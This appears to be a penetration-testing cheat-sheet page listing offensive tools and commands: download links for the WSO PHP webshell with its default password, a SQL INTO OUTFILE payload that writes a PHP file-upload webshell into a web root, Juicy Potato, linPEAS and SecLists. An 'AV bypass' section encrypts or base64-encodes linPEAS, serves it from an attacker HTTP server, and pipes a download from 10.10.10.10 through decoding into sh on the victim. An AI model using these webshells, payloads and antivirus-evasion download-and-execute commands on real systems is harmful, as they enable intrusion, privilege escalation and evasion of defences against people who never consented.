Downloads

WSO php webshell

Password	ghost287	Edit line 7 (md5 hash)
Email	test@testmail.com	Edit line 4

New Design: most Beautiful
 php 7.x issue resolved
 Easy to use
 Password login protection
 Server Infection possibility
 Managing SQL Databases
 No Tracker
 More useful features...
 
 wget https://raw.githubusercontent.com/mIcHyAmRaNe/wso-webshell/master/wso.php

Uploader .php

SELECT "<?php echo \'<form action=\"\" method=\"post\" enctype=\"multipart/form-data\" name=\"uploader\" id=\"uploader\">\';echo \'<input type=\"file\" name=\"file\" size=\"50\"><input name=\"_upl\" type=\"submit\" id=\"_upl\" value=\"Upload\"></form>\'; if( $_POST[\'_upl\'] == \"Upload\" ) { if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Done.<b><br><br>\'; }else { echo \'<b>Upload Failed.</b><br><br>\'; }}?>"INTO OUTFILE 'C:/wamp/www/uploader.php';

Juicy Potato

Juicy Potato Download: 
https://github.com/ohpe/juicy-potato

Threader3000

Installation via Pip

pip3 install threader3000

Install via Git

git clone https://github.com/dievus/threader3000.git #to save the program to your machine, or utilize the download option

Linpeas

#From github
curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh
wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh

AV bypass

#open-ssl encryption
openssl enc -aes-256-cbc -pbkdf2 -salt -pass pass:AVBypassWithAES -in linpeas.sh -out lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | openssl enc -aes-256-cbc -pbkdf2 -d -pass pass:AVBypassWithAES | sh #Download from the victim

#Base64 encoded
base64 -w0 linpeas.sh > lp.enc
sudo python -m SimpleHTTPServer 80 #Start HTTP server
curl 10.10.10.10/lp.enc | base64 -d | sh #Download from the victim

SecLists

About SecLists

https://github.com/danielmiessler/SecLists

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more. The goal is to enable a security tester to pull this repository onto a new testing box and have access to every type of list that may be needed.

Install

Zip

wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip \
  && unzip SecList.zip \
  && rm -f SecList.zip

Git (Small)

git clone --depth 1 https://github.com/danielmiessler/SecLists.git

Git (Complete)

git clone https://github.com/danielmiessler/SecLists.git

Kali Linux (Tool Page)

apt -y install seclists
Previous1. SpikingNextOnline Websites

Last updated

Was this helpful?